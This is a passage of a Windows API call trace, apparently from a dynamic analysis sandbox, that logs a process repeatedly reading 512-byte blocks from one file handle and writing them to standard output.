lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.135] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.135] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.136] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.136] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.137] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.137] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.139] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.139] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.140] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.140] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.141] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.141] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.142] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.142] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.143] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.143] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, 